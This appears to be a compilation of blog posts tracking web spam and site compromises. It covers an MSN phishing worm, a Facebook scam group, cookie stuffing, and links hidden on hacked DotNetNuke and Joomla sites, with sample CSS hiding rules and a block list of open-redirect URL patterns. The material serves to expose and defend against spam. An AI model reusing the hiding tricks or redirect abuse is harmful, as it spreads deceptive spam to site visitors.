I’ve had three messages from friends on MSN the last two days that weren’t actually from them. They were all Norwegian nationals, and were unlikely to write to me in English. And they certainly were unlikely to “cold call” links to dodgy sites.

Most likely there’s a form of MSN worm making the rounds in Norway right now.

Hmmm, combination worm/phish, it appears…

I checked the latest URL with a text browser, and there was a redirect to a page with the title:
MSN anti-Block Checker is now FREE!

The page then says:
Your Contact List is Searcing now…
Please Wait!

And then an alert:
Congratulations! Your MSN Contact List is clear! Nobody has blocked you

I also found this:
Please fill MSN Account and Password fields

UPDATE:
Oh dear (as Miss Marple would say, she was just on TV).

Another link I received led to a 302 redirect and then to an exe file. I’ve got it saved on a unix server, if anyone’s interested in examining it.

The third link went to a spammy page on weightloss pills.

Spammers appear to have set their sights on Facebook for spamming purposes. But since outgoing links have rel nofollow, it’s no good for Googlejuice. So let’s examine an actual example of a group set up for spam purposes:

http://www.facebook.com/group.php?gid=56828903531

It’s a group touting something called ProfileLock. Problem is, there’s no such thing. It’s just a clever second attempt at hawking wares (in this case, it’s a SEO firm).

The website associated with the group is called GoogleMarketing101.com. Normally variations on Google are not owned by Google, so I checked. The address was in Florida, in an area where spammers abound. I checked the name, the address and the domain name. The owner has talked about Facebook and SEO before. And he’s also made a Facebook group before, only it didn’t do so well: http://www.facebook.com/pages/Google-Marketing-101/46023747363

So what does he do? He capitalizes on the paranoia of people who have lost their profiles before due to some infraction or other. And the guy who sent the invitation to me DID lose his profile once. THAT’s where viral comes into the picture. People are gullible, and join because they have a need. What they don’t realize is that this is just a ploy to get people to click on the link, which is what it’s actually about.

This particular group promises that if you post the name on your Facebook profile along with your ID number, you will lock it in. It’s a scam. That group is very likely to disappear. You’re better off saving that data on your computer somewhere.

I’m sure Joel wouldn’t consider himself a spammer. After all, he doesn’t send out invitations to this group himself, he tricks his friends into doing it. Yes, I have a friend in common with this guy. So I’m not so much saying he’s a spammer as I’m saying this group is a scam, and I’m lumping the attempt in with other stuff I see on the web that I consider “spammy”.

These are the least likely to be spotted hackings I’ve ever seen.

Andrew Jensen commented on a post, leaving this case story of a Dot Net Nuke hacking.

I checked into some sites that had been hacked, and here’s what I found (and do read his post first):

One one site, the hacked links were inserted into the links at the very top, a div class named headerlinks. The hacked links were placed
top: -1500px; position: absolute
and
z-index: -2; position: absolute

On another site the links were placed prior to the main column.

It seems these links may be individually or randomly placed on the page. And the position (outside the browser window) also appears to be random.

I also found one hacked link that was placed differently:
position: absolute; left: 0px; bottom: 0px; font-size: 0.5em

That same site appeared to have a second, earlier hacking right above, with this code:
div style=”display: none

One sight seemed to proudly display the links, as Sponsors, while another touted the site in a blog post. A third had a small text link under the Google Ad block.

Here are the links I found apparently hacked into Dot Net Nuke installations. They may not all have been inserted by the same hacker:

filespie.com
movie2b.com
qarea.com
gigsofmp3.com
zmovielibrary.com
allgenresmusic.com
mp3filesdirectory.com

Update: qarea.com is affiliated with bughuntress.com, which has no shady links. We of course don’t know if they’ve paid for the hacking, or if someone included their site anyway.

I came across a hacked site today. Turns out it was based on an older version of Joomla. That MIGHT be where the hackers got in, but not necessarily. I checked on that site a few weeks ago (there’s actually still a Google cache from back then, Jan 20, 2009), and back then I first thought something was wrong with the software, and then eventually found that the database server was down. I hadn’t been back until today.

(name of site removed) is a website belonging to a guy who writes books and articles on stalking, cyberstalking, bullying and online security. These days I don’t normally include the name of the sites that have been hacked, but this time I couldn’t resist. The security guy got hacked (OK, he says he’s not a security guy, I just thought it sounded good…). I’m sure this will be fodder for a great new article from the security guy!

He’s got lots of pages visible in Google from when the site was operational (as late as February 22, 2009). But now all those pages redirect to the root page. If you check index.html, you get a normal 404 error page, but index.php is a hacked 404 error page, that contains the hacked code.

The code is unescaped text using eval. It’s an iframe pointing to a Russian site. I never got so far as to see what was there, because my anti-virus dislikes the code. The source code on the page complains that the template file can’t be found. These hacks quite often pull in the code dynamically from a different website, so the code you see when you access the website might not be what’s hidden in the hacked site (in other words, finding the hacked code isn’t easy - better remove everything and reupload from your computer). And the exploit itself (usually a file that will infect a visiting computer) might be on a third site.

Here’s an image containing (first part) the code I found on the page, prior to the unescaped string, and (last part) what that string decoded to.

This hack has been mentioned online as early as 2007, and a year ago, and it’s been mentioned as serving malware, but this site was recently hacked, as far as I know.  According to others who had that happen, the hack was done through php scripts uploaded by clients. I checked other domains currently on the same server, and they do not appear to be affected.

Here’s an analysis of who is behind this (Nov 2007)

There’s a guy in my “network” who keeps on joining one network after another. And he always sends me invitations. They go straight in the “half spam” bucket.

The latest invitation piqued my curiosity. It was from mydailyflog.com, and it said:

Hi!
I would like to invite you to visit MyDailyFlog and see my latest photos.

And then the link, which was on this format:

http://www.mydailyflog.com/go/invite_register/randomusername/somenumber

Hmm, this doesn’t look to me like the link to a post with his latest photos? Because if he was sending me an invitation to view his latest photos, I’d be inclined to go check them out. But invite_register? That sounds awfully like fanbox behavior. How do I know they won’t create a profile for me just from that link? I had to test it, but not with my own e-mail address - I don’t want to encourage them to keep spamming me, so I find a random invitation in Google (yes I know, it’s ethically questionable, but Google has followed a bunch of those already, so…).

And yes, they have the e-mail address filled out, and are just waiting for my password.

Oh, and he has no photos at all yet, so this wasn’t a specific invitation to me, which I wouldn’t mind - for specific photos he manually invited me to see, but an attempt to get me to sign up.

I also checked the Terms of Service, and they state among other things that:

…You are solely responsible for any use of or action taken under your password on the Site. Your password may be used only to post Posted Content, review information regarding potential and completed transactions and otherwise access and use the Site and Services in accordance with these Terms and Conditions…. …You accept full responsibility for all transactions and other activity placed or conducted through your account and agree to and hereby release MyDailyFlog from any and all liability concerning such transactions or activity….

There’s just one problem with that… The e-mail I received was not sent by my friend, but by the dailyflog system - which means he either expressly gave them my address, or gave them access to his address book, presumably by giving them his webmail password.

So… Dailyflog sends out invitations, and you’re responsible. Now, why does that sound familiar?

Update: Very funny, I now got an invitation with a link identical to the one I put into this blog post. Serves me right for including the number at the end, which was identical to the number on the first invitation I got. So it’s possible that the number identifies a specific e-mail address regardless of who the “inviter” is?

I’ve sent out a few newsletters recently, and got one reply that raised my suspicions. It was a vacation reply that hawked a website, and it looked like spam. Although I don’t know the person who owns the e-mail address, I suspect she was hacked, and somebody turned on her vacation response and filled it with their spam.

hi:
Heya, how are you doing recently ? I would like to introduce you a very good company which I knew. Their company homepage is www.sugefa.com. They can offer you all kinds of electronical products which you need, such as motorcycles, laptops, mobile phones, digial cameras, TV LCD,xbox, ps3, gps, MP3/4, etc. Please take some time to have a look at it, there must be something you ‘d like to purchase.
Their contact email: sugefa@188.com.
MSN: sugefa@hotmail.com
TEL: +8610-80973507
Hope you have a good mood in shopping from their company!
Regards

I’ve found the same sentences on the net, on a blog that seems to use e-mail to post. The owner probably didn’t send some of those posts from September and October.

Here’s a report on this spammer/hacker.

If you see a vacation response like this, please notify the person it came from, maybe via Facebook or another address as well if you can. They’re usually so mortified they got hacked, so they might not reply to you, unfortunately. Getting hacked is no longer something to be ashamed of. There are so many ways they hack people, you’ll have to be VERY good with computers and very lucky to avoid ever being hacked.

More people talking about this phenomenon:

Computerhope
taint.org

Estdomains, home to lots of spam domains, is now history. Good riddance!

I wrote a while ago about a network of pages with fake biographies generated from a database and a script. Well, Phonera/Port80 has upped the ante.

Now they’ve created fake descriptions of Swedish domain names (yes, existing ones) on the same network of IP addresses. The net result is that those fake pages rank well if you search for that domain name. And presumably also if you search for the part before .se.

None of the pages are served right now, they return “socket error”. But they’re still filling up the Google index with junk.

The way I see it, Google should dump the entire 93.158.64.0 - 93.158.127.255 range now including the cache, when those pages are referenced by IP number instead of a domain name. And put a block on that IP range preventing those IP numbers from being crawled in the future, unless it’s a domain name that’s resolving to that IP range. Although there are some domains in that range, if you make sure you only nuke pages referenced by the IP number in Google, you should be golden.

I got an e-mail from a forum owner, asking about a particular behavior on his forum.

Several people had signed up for accounts and were posting low content posts on lots of threads. Looked like just another “me too” type poster until they saw a broken image link in edit view. The image didn’t show up in the post that he could see. Hence the mail to me.

One of the user names was SEOdeveloping, which made the forum owner do some digging. He turned up a Cookie Stuffing script posted for sale by someone by the same nick.

I checked out the image link, and found there were a couple 302 redirects in place, which made me think something was up - no point in using PHP redirects unless you’re up to something.

So I connected the two dots, and searched for these words:

cookie stuffing images

I found an article by former regular Esrun, explaining the technique. It’s the technique labeled image/2. Basically, they’re shoving a cookie on your system. Presumably they’re an affiliate of some well known site, and if you happen to visit that site and sign up or buy something, the cookie stuffer will get the signup bonus or affiliate percentage.
So time to send out a warning: Be careful about allowing your users to post images pointing to sites other than those you control. Otherwise you might have to check the images carefully.

This time, the domain the image sat on was photo-shack.com, which resembles closely a well known image hosting site. And although the image didn’t work the first time I checked one of the posts, it did the second time. I did receive a cookie from photo-shack.com each time I loaded that forum post, whether or not the smiley was visible. It was a nice Christmas smiley, and I’m guessing that spam campaign has been quite successful - they’re posting manually, the posts are on topic, and they’re behaving themselves. It doesn’t appear to be spam, because there’s no visible payoff.

But they ARE stuffing cookies.

Here’s a random hit from Google, with not one but TWO images loading from his fake image hosting site.

I haven’t blogged much about webspam lately. Akismet kills most of it, so I’m not as annoyed.

But enter a new Wordpress installation. It took a few week for the first spam to arrive, and then I attracted a regular. Geez, that’s annoying. I hadn’t had time to do something about the spam yet, but it was starting to annoy me enough I took a closer look.

What I found was a lot of redirects to spammy sites from innocent third parties. Many of them from Bitrix installations, but judging from the URL’s, there are plenty of other susceptible redirect scripts. Here’s a sampling of code you could block in blog and forum software, and that would silently get rid of a lot of spam posts:.

external.php?url=http://
go.cgi?dest=http://
go.asp?url=http://
link.php?url=http://
links_ext.pl?http://
out.php?url=http://
rd?t=http://
redirect.cfm?trgturl=http://
redirect.php?goto=http://
redirect.php?url=http://

Another bad thing about these scripts, is that you could pick up a trojan by going to a site you thought was safe, if you didn’t notice that there was a redirect actually pointing somewhere else than the safe site the redirect script is sitting on.